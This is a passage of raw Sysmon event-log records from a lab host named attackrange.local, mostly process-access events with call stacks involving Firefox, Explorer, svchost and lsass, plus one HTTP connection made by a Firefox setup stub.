Firefox\xul.dll+3ef4c54|C:\Program Files\Mozilla Firefox\xul.dll+122494a|C:\Program Files\Mozilla Firefox\xul.dll+13e0e4|C:\Program Files\Mozilla Firefox\xul.dll+1878175|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174|C:\Program Files\Mozilla Firefox\xul.dll+1a2d2b|C:\Program Files\Mozilla Firefox\xul.dll+3ed3ff3|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53 10341000x800000000000000016902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.845{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2debab7|C:\Program Files\Mozilla Firefox\xul.dll+2deb9d9|C:\Program Files\Mozilla Firefox\xul.dll+2ed10b5|C:\Program Files\Mozilla Firefox\xul.dll+2ecde71|C:\Program Files\Mozilla Firefox\xul.dll+2ecc384|C:\Program Files\Mozilla Firefox\xul.dll+2ec3074 
10341000x800000000000000016901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.842{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000016900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.841{59A5CD1D-93FA-6005-FC04-00000000A301}37845232C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37841028C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37841028C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.817{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.770{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e|C:\Program Files\Mozilla Firefox\xul.dll+2123438|C:\Program Files\Mozilla Firefox\xul.dll+24095e|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+19c174 10341000x800000000000000016893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla 
Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.724{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla 
Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c5a73|C:\Program Files\Mozilla Firefox\xul.dll+197b04e 10341000x800000000000000016890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:59:56.775{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-495.attackrange.local49207-false34.215.48.141ec2-34-215-48-141.us-west-2.compute.amazonaws.com80http 10341000x800000000000000016887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.147{59A5CD1D-945A-6005-3305-00000000A301}70526276C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+f74b0e|C:\Program Files\Mozilla Firefox\xul.dll+1087037|C:\Program Files\Mozilla Firefox\xul.dll+11c4361|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+3b226|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla 
Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.130{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.130{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla 
Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.114{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.083{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+a8c121|C:\Program Files\Mozilla Firefox\xul.dll+5315462|C:\Program Files\Mozilla Firefox\xul.dll+126ae69|C:\Program Files\Mozilla Firefox\xul.dll+126cc24|C:\Program Files\Mozilla Firefox\xul.dll+1057af|C:\Program Files\Mozilla Firefox\xul.dll+3ec30a1|C:\Program Files\Mozilla Firefox\xul.dll+105c62|C:\Program Files\Mozilla Firefox\xul.dll+19ee53|C:\Program Files\Mozilla Firefox\xul.dll+1267370|C:\Program Files\Mozilla Firefox\xul.dll+19ea7a|C:\Program Files\Mozilla Firefox\xul.dll+53154b9 10341000x800000000000000016881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.067{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000016878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.045{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla 